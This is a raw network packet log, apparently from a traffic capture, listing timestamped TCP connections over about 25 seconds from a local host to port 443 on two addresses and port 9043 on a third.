                                                                                                                                          Nov 13, 2024 18:21:50.848263025 CET49997443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:50.863998890 CET49998443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:50.864049911 CET44349998104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:50.864119053 CET49998443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:50.864464045 CET49998443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:50.864474058 CET44349998104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:51.153908968 CET49997443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:51.153949022 CET44349997104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:51.751579046 CET44349998104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:51.751655102 CET49998443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:51.752229929 CET49998443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:51.752239943 CET44349998104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:51.753473997 CET49998443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:51.753479004 CET44349998104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:52.459070921 CET44349998104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:52.459151983 CET44349998104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:52.459186077 CET49998443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:52.459243059 CET49998443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:52.459593058 CET49998443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:52.459614038 CET44349998104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:52.465210915 CET49999443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:52.465250015 CET44349999104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:52.465351105 CET49999443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:52.465554953 CET49999443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:52.465565920 CET44349999104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:54.029295921 CET49999443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:54.109589100 CET50000443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:54.109702110 CET44350000104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:54.109777927 CET50000443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:54.110397100 CET50000443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:54.110430002 CET44350000104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:55.239062071 CET44350000104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:55.239146948 CET50000443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:55.239593029 CET50000443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:55.239603996 CET44350000104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:55.240689993 CET50000443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:55.240695000 CET44350000104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:55.976013899 CET44350000104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:55.976109982 CET50000443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:55.976141930 CET44350000104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:55.976227999 CET50000443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:55.976234913 CET44350000104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:55.976262093 CET44350000104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:55.976274967 CET50000443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:55.976311922 CET50000443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:55.976519108 CET50000443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:55.976536989 CET44350000104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:55.981641054 CET50001443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:55.981683969 CET44350001104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:55.981769085 CET50001443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:55.982095957 CET50001443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:55.982109070 CET44350001104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:56.848208904 CET44350001104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:56.848284960 CET50001443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:56.850940943 CET50001443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:56.850965023 CET44350001104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:56.851388931 CET44350001104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:56.851449013 CET50001443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:56.851763010 CET50001443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:56.895374060 CET44350001104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:57.511626005 CET44350001104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:57.511717081 CET44350001104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:57.511835098 CET50001443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:57.511835098 CET50001443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:57.512258053 CET50001443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:57.512281895 CET44350001104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:57.533061981 CET50003443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:57.533174992 CET44350003104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:57.533423901 CET50003443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:57.533626080 CET50003443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:57.533652067 CET44350003104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:57.698237896 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:21:57.698503017 CET497109043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:21:57.703218937 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:57.703381062 CET90434971045.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:58.482774019 CET44350003104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:58.482923985 CET50003443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:58.483361006 CET50003443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:58.483369112 CET44350003104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:58.484718084 CET50003443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:58.484723091 CET44350003104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:59.253602028 CET44350003104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:59.253676891 CET44350003104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:59.253774881 CET50003443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:59.253774881 CET50003443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:59.254434109 CET50003443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:59.254482031 CET44350003104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:59.307492971 CET50004443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:59.307553053 CET44350004104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:59.307667971 CET50004443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:59.307919979 CET50004443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:59.307934046 CET44350004104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:59.983897924 CET44350004104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:59.983990908 CET50004443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:59.984450102 CET50004443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:59.984458923 CET44350004104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:59.985467911 CET50004443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:59.985474110 CET44350004104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:00.256258965 CET44350004104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:00.256330967 CET50004443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:00.256345034 CET44350004104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:00.256355047 CET44350004104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:00.256391048 CET50004443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:00.256403923 CET50004443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:00.256669998 CET50004443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:00.256690025 CET44350004104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:00.267164946 CET50005443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:00.267219067 CET44350005104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:00.267330885 CET50005443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:00.268300056 CET50005443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:00.268316984 CET44350005104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:00.966500044 CET44350005104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:00.966574907 CET50005443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:00.967072964 CET50005443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:00.967087030 CET44350005104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:00.968477964 CET50005443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:00.968483925 CET44350005104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:01.239119053 CET44350005104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:01.239195108 CET50005443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:01.239227057 CET44350005104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:01.239238977 CET44350005104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:01.239278078 CET50005443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:01.239291906 CET50005443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:01.239595890 CET50005443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:01.239614964 CET44350005104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:01.245536089 CET50006443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:01.245611906 CET44350006104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:01.245908022 CET50006443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:01.245908022 CET50006443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:01.245965004 CET44350006104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:01.860471964 CET44350006104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:01.861078978 CET50006443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:01.868972063 CET50006443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:01.868993998 CET44350006104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:01.880647898 CET50006443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:01.880665064 CET44350006104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:02.288259983 CET44350006104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:02.288366079 CET50006443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:02.289285898 CET44350006104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:02.289375067 CET50006443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:02.289391994 CET44350006104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:02.289459944 CET44350006104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:02.289644003 CET50006443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:02.289822102 CET50006443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:02.289841890 CET44350006104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:02.299367905 CET50007443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:02.299477100 CET44350007104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:02.299807072 CET50007443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:02.300098896 CET50007443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:02.300128937 CET44350007104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:02.912302971 CET44350007104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:02.912370920 CET50007443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:02.912755013 CET50007443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:02.912764072 CET44350007104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:02.913716078 CET50007443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:02.913722992 CET44350007104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:03.397030115 CET44350007104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:03.397079945 CET50007443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:03.397089958 CET44350007104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:03.397099972 CET44350007104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:03.397134066 CET50007443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:03.397479057 CET50007443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:03.397495031 CET44350007104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:03.402448893 CET50008443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:03.402494907 CET44350008104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:03.402551889 CET50008443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:03.402765036 CET50008443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:03.402781010 CET44350008104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:03.541928053 CET500099043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:03.547103882 CET90435000945.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:03.550091982 CET500099043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:03.553949118 CET500099043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:03.558959007 CET90435000945.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.417968035 CET90435000945.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.417980909 CET90435000945.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.417985916 CET90435000945.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.417993069 CET90435000945.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.417999029 CET90435000945.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.418102026 CET500099043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:04.419647932 CET44350008104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.419791937 CET50008443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:04.426527023 CET50008443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:04.426537991 CET44350008104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.427901030 CET50008443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:04.427906036 CET44350008104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.468136072 CET500099043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:04.473319054 CET90435000945.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.703178883 CET90435000945.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.703243017 CET500099043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:04.704911947 CET500099043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:04.711194992 CET90435000945.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.996776104 CET44350008104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.996869087 CET50008443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:04.996901989 CET44350008104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:04.996967077 CET50008443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:04.997710943 CET50008443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:04.997756958 CET44350008104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:05.018647909 CET50010443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:05.018692017 CET44350010104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:05.018791914 CET50010443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:05.019010067 CET50010443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:05.019035101 CET44350010104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:05.143867970 CET90435000945.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:05.143929958 CET500099043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:06.670964956 CET44350010104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:06.671026945 CET50010443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:06.696238995 CET50010443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:06.696268082 CET44350010104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:06.697561979 CET50010443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:06.697578907 CET44350010104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:07.413280964 CET44350010104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:07.413342953 CET50010443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:07.413369894 CET44350010104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:07.413393021 CET44350010104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:07.413471937 CET50010443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:07.413791895 CET50010443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:07.413804054 CET44350010104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:07.417776108 CET50011443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:07.417854071 CET44350011104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:07.417922974 CET50011443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:07.418181896 CET50011443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:07.418215036 CET44350011104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:08.316803932 CET44350011104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:08.316987038 CET50011443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:08.317296982 CET50011443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:08.317311049 CET44350011104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:08.318336964 CET50011443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:08.318351030 CET44350011104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:09.125906944 CET44350011104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:09.125984907 CET50011443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:09.125992060 CET44350011104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:09.126036882 CET50011443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:09.126210928 CET50011443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:09.126234055 CET44350011104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:09.141505957 CET50012443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:09.141561985 CET44350012104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:09.141648054 CET50012443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:09.141897917 CET50012443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:09.141911030 CET44350012104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:09.788017035 CET44350012104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:09.788113117 CET50012443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:09.788553953 CET50012443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:09.788558960 CET44350012104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:09.789679050 CET50012443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:09.789685965 CET44350012104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:10.189136982 CET44350012104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:10.189229012 CET44350012104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:10.189301968 CET50012443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:10.189452887 CET50012443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:10.189600945 CET50012443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:10.189635992 CET44350012104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:10.194312096 CET50013443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:10.194344044 CET44350013104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:10.194525003 CET50013443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:10.194706917 CET50013443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:10.194719076 CET44350013104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:11.153109074 CET44350013104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:11.153188944 CET50013443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:11.153697968 CET50013443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:11.153709888 CET44350013104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:11.155220985 CET50013443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:11.155231953 CET44350013104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:11.723365068 CET44350013104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:11.723452091 CET44350013104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:11.723472118 CET50013443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:11.723674059 CET50013443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:11.723674059 CET50013443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:11.737982035 CET50014443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:11.738019943 CET44350014104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:11.738107920 CET50014443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:11.738348961 CET50014443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:11.738363981 CET44350014104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:12.028456926 CET50013443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:12.028497934 CET44350013104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:12.681530952 CET44350014104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:12.681683064 CET50014443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:12.682142973 CET50014443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:12.682153940 CET44350014104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:12.683232069 CET50014443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:12.683237076 CET44350014104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:13.418339968 CET44350014104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:13.418392897 CET50014443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:13.418409109 CET44350014104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:13.418426037 CET44350014104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:13.418462992 CET50014443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:13.418509007 CET50014443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:13.418880939 CET50014443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:13.418890953 CET44350014104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:13.424374104 CET50015443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:13.424411058 CET44350015104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:13.424463987 CET50015443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:13.424714088 CET50015443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:13.424731970 CET44350015104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:14.294651031 CET44350015104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:14.294877052 CET50015443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:14.296149015 CET50015443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:14.296149015 CET50015443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:14.296154976 CET44350015104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:14.296166897 CET44350015104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:15.100958109 CET44350015104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:15.101025105 CET50015443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:15.101037025 CET44350015104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:15.101074934 CET50015443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:15.101080894 CET44350015104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:15.101094961 CET44350015104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:15.101119041 CET50015443192.168.2.6104.21.15.162
